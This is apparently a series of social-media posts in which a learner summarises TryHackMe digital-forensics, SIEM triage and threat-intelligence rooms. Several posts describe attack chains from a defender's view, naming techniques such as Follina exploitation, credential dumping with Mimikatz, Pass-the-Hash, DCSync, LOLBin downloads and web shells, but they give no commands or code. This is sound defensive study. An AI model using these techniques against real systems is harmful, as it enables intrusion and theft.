I completed the KAPE room on TryHackMe today, where I learnt that KAPE (Kroll Artifact Parser and Extractor) is a forensic triage tool used to parse and extract Windows forensics artifacts. Instead of manually searching for artifacts, you define what to collect using Targets and how to process the collected data using Modules. Once a source drive is specified, KAPE automates the collection and parsing process. I explored KAPE both through its GUI and CLI interfaces and learnt how both can be used to perform forensic triage efficiently. I did a hands-on exercise, where I investigated a user who violated their company’s AUP (Acceptable Use Policy) by connecting unauthorized USB devices, installing software from a network drive, and connecting to unknown networks. Using KapeTriage together with !EZParser, I collected and parsed the system’s artifacts, then analyzed the resulting CSV files in EZViewer to answer the questions. tryhackme.com/room/kape?utm_… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today, I completed the Forensic Imaging room on TryHackMe. I learnt that forensic imaging is the process of creating an exact bit-by-bit copy of digital storage media, capturing everything including deleted files, hidden files, and unallocated space. The copy must be verifiable and admissible in court, which means maintaining chain of custody throughout. I also covered write-blockers, which prevent any modifications to the original evidence during acquisition. I did a practical hands-on exercise, where I was tasked to create an image of a 1GB loop device and generated the MD5 hash of the image to verify the integrity. I then mounted the image and extracted the flag from the file flag.txt, which confirms the file system was accessible and the image could be successfully examined. tryhackme.com/room/forensici… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

I completed the Intro to Cold System Forensics room on TryHackMe today. I learnt how DFIR teams examine powered-off or dormant systems and the key differences between cold system forensics and live system forensics. I covered important concepts such as the order of volatility, disk imaging with write blockers, and chain of custody practices used to preserve evidence integrity. I also explored key tools used in acquisition like dd/dc3dd, Guymager, and FTK Imager, as well as analysis tools like The Sleuth Kit, Autopsy, EnCase, and Magnet AXIOM. Finally, I completed an exercise where I arranged forensic data by volatility order and filled out a proper chain of custody record to capture a disk image from a breached web server. tryhackme.com/room/introtoco… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today, I completed the Legal Considerations in DFIR room on TryHackMe. I covered ethical decision-making, legal compliance frameworks (SOX, CFAA), rules of evidence across different jurisdictions, and what makes digital evidence admissible in court. I also investigated a corporate fraud incident at SwiftSpend Finance, where a CFO’s credit card was used in an unauthorized $9k transaction. I traced the attack through Outlook emails, identified the person of interest (POI), and analyzed Exchange Server IIS logs to find unauthorized remote logins from a Linux machine using Firefox. Finally, I examined the actual log files, identified the anomalous IP address, and confirmed the compromised account. I then performed Chain of Custody procedures by retrieving the verified SHA1 hashes of the IIS log files and the POI’s OST file to prove evidence integrity. tryhackme.com/room/dfirproce… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Throughout the weekend, I rested and revised the previous week’s work. Today, I read chapters 3 and 4 of the Digital Forensics Handbook by Lucas Mahler. Chapter 3 covers The DFIR Toolkit, where I learnt that every forensic examiner needs the right operating system and tools. Linux-based distributions like CAINE and Parrot OS are built for forensic work, and help preserve evidence integrity by mounting drives as read-only by default. Also I covered key tools like The Sleuth Kit for file system forensics, Volatility for memory analysis, dcfldd/dc3dd for forensic imaging, Xplico for PCAP/network analysis, and dd as the classic disk utility. Chapter 4 covers Investigation Checklist. I learnt that a proper DFIR examination follows a strict process: verify legal authority first, document everything, maintain chain of custody, and never make assumptions. Your report must be reproducible by anyone who picks it up. Another important rule I learnt is that: “If it wasn’t documented, it didn’t happen”. @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today I’m still going through the fundamentals of Digital Forensics and Incident Response (DFIR). I completed the DFIR: An Introduction room on TryHackMe. I covered what DFIR is, core concepts like artifacts, evidence preservation, chain of custody, order of volatility, and timeline creation. I learnt about key tools used in the field which include, Eric Zimmermans tools, Autopsy, Volatility, KAPE, Velociraptor, and Redline. Also I learnt about the incident response lifecycle which consist of Preparation, Identification, Containment, Eradication, Recovery and Lessons Learned and also how it maps to the NIST and SANS incident response frameworks. tryhackme.com/room/introduct… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today, I completed the TryHackMe Intro to Digital Forensics room. I learnt that digital forensics is the application of computer science to investigate digital evidence for a legal purpose. I also learnt how digital forensics applies to both public-sector (law enforcement) and private-sector (corporate) investigations, and why proper evidence handling, such as establishing a chain of custody, creating forensic copies, and using validated tools matter a lot in this field. I did a practical exercise where I used pdfinfo to extract PDF metadata and identified the document author. Then I also used exiftool on a JPEG to pull embedded EXIF (Exchangeable Image File Format) metadata which includes GPS coordinates and camera model. tryhackme.com/room/introdigi… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today on TryHackMe, I completed the Boogeyman 3 challenge room, where I traced a full enterprise attack chain using ELK. The attacker sent a phishing email to the CEO with a fake PDF that was actually an ISO file containing a malicious HTA. From there it was clear that mshta.exe executed the payload, a DLL was dropped and run via rundll32, persistence was set via a scheduled task, and C2 communication was established over port 80. The attacker then bypassed UAC using fodhelper.exe, downloaded Mimikatz from GitHub, dumped credentials, and moved laterally across machines using Pass-the-Hash. They eventually reached the Domain Controller, they ran a DCSync attack to dump AD hashes, and deployed ransomware. I learnt that every action a threat actor takes leaves a trace in the logs. tryhackme.com/room/boogeyman… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

I completed the Boogeyman 2 challenge room, where i was tasked with investigating a phishing attack involving macro malware and memory forensics. The scenario involved an HR specialist who received a fake job application email. The attached Microsoft Word document contained a malicious VBA macro that silently downloaded and executed a malicious JavaScript file, which then retrieved a malware binary that established a C2 connection to a remote attacker server. Using olevba, I extracted the malicious macro and identified the download URLs used to deliver the payloads. Then I used Volatility3 to analyze the memory dump, tracing the full process tree from WINWORD.EXE → wscript.exe → updater.exe. Through memory analysis, i identified the attacker’s C2 IP address and port, and uncovered a scheduled task the attacker planted for daily persistence using a Base64 encoded PowerShell payload hidden in the registry. I was able to learn that a single malicious email attachment can give an attacker full control of a system. As defenders, disabling macros by default and training employees to recognize phishing emails remains one of the most effective defences against this attack vector. tryhackme.com/room/boogeyman… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today on TryHackMe, I completed the Boogeyman 1 challenge room. The scenario involved investigating a phishing attack on a finance employee from initial email delivery all the way to data exfiltration. During the investigation, i analysed a raw .eml file to identify the attacker’s spoofed domain, extracted a password-protected ZIP archive containing a malicious LNK file disguised as an Excel document, and used lnkparse to uncover a hidden PowerShell payload inside it. From there I examined PowerShell logs with jq to reconstruct the full attack chain and analyzed network traffic using Wireshark and Tshark to confirm C2 communication. Also i reconstructed the hex-encoded data hidden inside DNS queries to recover a stolen KeePass vault containing a credit card number. The key tools i used during the investigation were Thunderbird, lnkparse, jq, Wireshark, Tshark. I also learnt that attackers don't always rely on obvious or loud methods. DNS traffic can be abused for data exfiltration while blending in with legitimate network activity, making it an important source of evidence during investigations. tryhackme.com/room/boogeyman… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

I wasn’t able to post yesterday, because I struggled to finish this room, but today I was able to complete the Tempest challenge room on TryHackMe. In this room, i was assigned the role of an Incident Responder to investigate through an entire attack chain from initial access to full system compromise. During the investigation, I discovered that the threat actor gained access through a malicious Microsoft Word document exploiting Follina (CVE-2022-30190). No malicious code was needed, just opening the file was enough to trigger code execution. The document silently downloaded malware written in Nim that communicated back to a C2 server using base64-encoded HTTP traffic to blend in with normal web activity. Once inside, the attacker ran reconnaissance commands through the C2, found a credentials file containing a plaintext password, and then used Chisel to set up a reverse socks proxy for stable access. From there they exploited SeImpersonatePrivilege using PrintSpoofer to escalate all the way to SYSTEM. With full control of the machine, the attacker created backdoor accounts, changed the Administrator password and installed a persistent Windows service to maintain access after reboots. The Tools I used during the investigation are: SysmonView, Timeline Explorer, EvtxEcmd, Brim, Wireshark, Virustotal (used to search up the hashes and see the tool/malware associated with it), and CyberChef. The key lesson I learnt is that a single document opened by one user was enough for the threat actor to takeover the entire system. This highlights the importance of defense-in-depth strategies, security awareness, and effective log monitoring to detect and respond to threats before they escalate. tryhackme.com/room/tempestin… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today on TryHackMe, I completed the Benign challenge room, where I investigated a compromised host using Splunk . I was given host-centric logs to find suspicious process execution from March 2022 and piece together exactly what happened on the system. During the investigation, I discovered an imposter account hiding among HR department users, identified a user running a suspicious scheduled task, and found that a user named Haroon abused a built-in Windows tool (certutil.exe) to silently download a malicious file from the internet. This technique is known as a LOLBin (Living Off the Land Binary) attack, where legitimate system tools are abused for malicious purposes. The downloaded file was benign.exe pulled from controlc[.]com, and I also recovered the hidden THM flag within it. I learnt that threat actors don’t always break in loudly. Sometimes they blend in by abusing trusted tools that already exist on the system, making detection much more difficult. tryhackme.com/room/benign?ut… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

I completed the ItsyBitsy challenge room today on TryHackMe, where I investigated a potential C2 communication alert using Kibana and Elastic SIEM. I analyzed 1,482 HTTP connection logs from March 2022 to trace suspicious activity from an HR department machine. During the investigation, I discovered that the malware was using bitsadmin, a legitimate Windows binary, to silently download a file called secret.txt from pastebin[.]com. The attackers abused this trusted file-sharing platform as a C2 server to blend malicious traffic with normal network activity. The file also contained a secret code, confirming active C2 communication. I was able to understand that threat actors abuse trusted platforms like Pastebin to evade detection. Also I learnt that as an analyst, it is important to monitor outbound HTTP traffic carefully, even when connections are made to legitimate websites. tryhackme.com/room/itsybitsy… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today on TryHackMe, I completed the Alert Triage With Elastic room. I performed a hands-on investigation using Kibana to search and filter both web and Windows logs, I identified key indicators of compromise (IoCs) across multiple log sources. I investigated a full attack chain, starting from a ProxyLogon web exploit to a web shell deployment, RDP login, backdoor account creation, PowerShell reconnaissance, and finally data staging with Rar.exe. One important lesson I learnt was that no alert was triggered for the for the final stage, this shows why analysts cannot only rely on alerts alone. Finally, I practiced correlating Security and Sysmon logs, writing KQL (Kibana Query Language) queries, and building evidence tables to trace attacker activity step by step. tryhackme.com/room/alerttria… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

I completed the Alert Triage with Splunk room on TryHackMe today, where I Investigated 3 real-world SOC alert scenarios using Splunk as the SIEM. Scenario 1 - Linux Brute Force: I traced a brute force attack on SSH, found 591 failed login attempts, the attacker gained access after 5 mins, escalated privileges to root, and created a persistence account (system-utm). Scenario 2 - Windows Persistence: I investigated a suspicious scheduled task on a Windows host, traced it to cmd.exe, I found that the attacker scanned the Administrators group and logged in from DEV-QA-SERVER. Scenario 3 - Web Shell: I identified Hydra brute forcing a WordPress login. The attacker uploaded b374k.php as a web shell through the theme editor and executed 4 commands through it. I learnt that logs tell the full story if you know what to query, and that Splunk makes it easier to correlate events across Linux, Windows, and web servers. tryhackme.com/room/alerttria… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Yesterday I rested and revised the previous week’s work. Today I completed the Log Analysis with SIEM room on TryHackMe. I learnt about the benefits of SIEM for analysts which includes, centralization, correlation, historical event analysis, visualization, detection rules, and automation workflows. I was given 3 real-world scenarios to analyze using Splunk: 1) Windows Logs: I traced a suspicious connection on port 5678 to a masquerading process (SharePoInt.exe in C:\Windows\Temp), retrieved its MD5 hash, and uncovered a scheduled task used for persistence. 2) Linux Logs: I investigated an unauthorized SSH access on an Ubuntu server, identified the user who escalated to root, and found a Python reverse shell cron job as the persistence mechanism. 3) Web Application Logs: I analyzed a spike in web server activity, identified the source IP and tool used by the threat actor. Also i was able to learn how to use SPL queries and EventCodes for threat hunting. tryhackme.com/room/loganalys… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today I completed a Threat Intel investigation room on TryHackMe. I investigated two suspicious indicators flagged by an L1 analyst: a suspicious IP and a SHA256 hash. Using a threat intelligence tool called TryDetectThis2.0, I analyzed both indicators, traced files and parent processes linked to the SHA256 hash, and identified malicious files associated with the flagged IP. I also used OSINT (google) to find the original threat report behind the campaign: “From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery”. The attackers used a phishing technique called ClickFix to trick victims into running the malware themselves, and a tool called ChromeKatz to steal browser cookies. Victims were then redirected to malicious servers through Discord. tryhackme.com/room/invite-on… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today on TryHackMe, I completed two rooms: File & Hash Threat Intel and IP & Domain Threat Intel. I learnt how to investigate suspicious files and hashes using hash lookups and sandbox analysis to identify malware behaviour and indicators of compromise (IOCs). Also I learnt how to investigate suspicious IPs and domains using DNS records, ASN details, geolocation, and reputation checks to identify malicious activity. tryhackme.com/room/fileandha… tryhackme.com/room/ipanddoma… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic

Today on TryHackMe, I completed the Intro to Cyber Threat Intelligence room. I learnt that Cyber Threat Intelligence (CTI) is the process of collecting and analyzing information about cyber threats so analysts can better understand, detect, and respond to attacks. I also learnt about CTI basics, where I explored the differences between raw data, information, and intelligence, as well as IOCs, IOAs, and TTPs. Went further to learn about the CTI Lifecycle, which consists of 6 phases: Direction, Collection, Processing, Analysis, Dissemination, and Feedback. I completed an exercise, where i analyzed a real alert chain and extracted several IOCs, including a phishing email, a malicious executable, registry-based persistence, and data exfiltration to a suspicious IP address. I was able to understand that CTI transforms an artifact, such as a suspicious IP address from just simple raw data into actionable intelligence that analysts can use to block threats, investigate incidents and escalate findings when necessary. tryhackme.com/room/cyberthre… @ireteeh @segoslavia @commando_skiipz @RedHatPentester @TemitopeSobulo @tryhackme @_DeejustDee @cyberjeremiah #BlueTeamer #tryhackme #Cybersecurity #LearninginPublic